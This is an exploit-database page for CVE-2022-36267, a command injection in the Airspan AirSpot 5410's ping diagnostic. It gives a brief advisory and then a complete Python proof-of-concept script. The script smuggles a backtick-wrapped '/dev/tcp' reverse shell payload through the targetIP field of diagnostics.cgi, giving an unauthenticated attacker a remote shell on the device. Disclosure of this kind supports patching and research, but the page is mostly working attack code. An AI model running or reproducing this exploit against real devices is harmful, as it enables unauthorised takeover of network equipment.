header-logo
Suggest Exploit
vendor:
AirSpot 5410
by:
Samy Younsi (NSLABS)
9.8
CVSS
CRITICAL
Remote Code Execution (RCE)
78
CWE
Product Name: AirSpot 5410
Affected Version From: 0.3.4.1-4
Affected Version To: 0.3.4.1-4
Patch Exists: YES
Related CWE: CVE-2022-36267
CPE: a:airspan:airspot_5410
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu
2022

Airspan AirSpot 5410 version 0.3.4.1 – Remote Code Execution (RCE)

A vulnerability in Airspan AirSpot 5410 version 0.3.4.1-4 and under allows an attacker to execute arbitrary code on the device. This is due to the lack of input validation in the pingDiagnostic.cgi page, which allows an attacker to inject arbitrary commands into the ping command. This can be exploited by sending a specially crafted POST request to the pingDiagnostic.cgi page.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Airspan AirSpot 5410.
Source

Exploit-DB raw data:

# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def banner():
  airspanLogo = """ 
      ,-.
     / \  `.  __..-,O
    :   \ --''_..-'.'
    |    . .-' `. '.
    :     .     .`.'
     \     `.  /  ..
      \      `.   ' .
       `,       `.   \
      ,|,`.        `-.\
     '.||  ``-...__..-`
      |  | Airspan 
      |__| AirSpot 5410
      /||\ PWNED x_x
     //||\\
    // || \\
 __//__||__\\__
'--------------'Necrum Security Labs
                        
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                 
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

def pingWebInterface(RHOST, RPORT):
  url = 'https://{}:{}'.format(RHOST, RPORT)
  try:
    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
    if response.status_code != 200:
      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
      exit()
    print('[INFO] Airspan device web interface seems reachable!')
  except:
    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
    exit()


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
  try:
    print('[INFO] Executing reverse shell...')
    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
    return
  except Exception as e:
      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
      return False

def main():
  banner()
  args = parser.parse_args()
  pingWebInterface(args.RHOST, args.RPORT)
  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
  main()

Navigation

Suggest Exploit

Services By CQR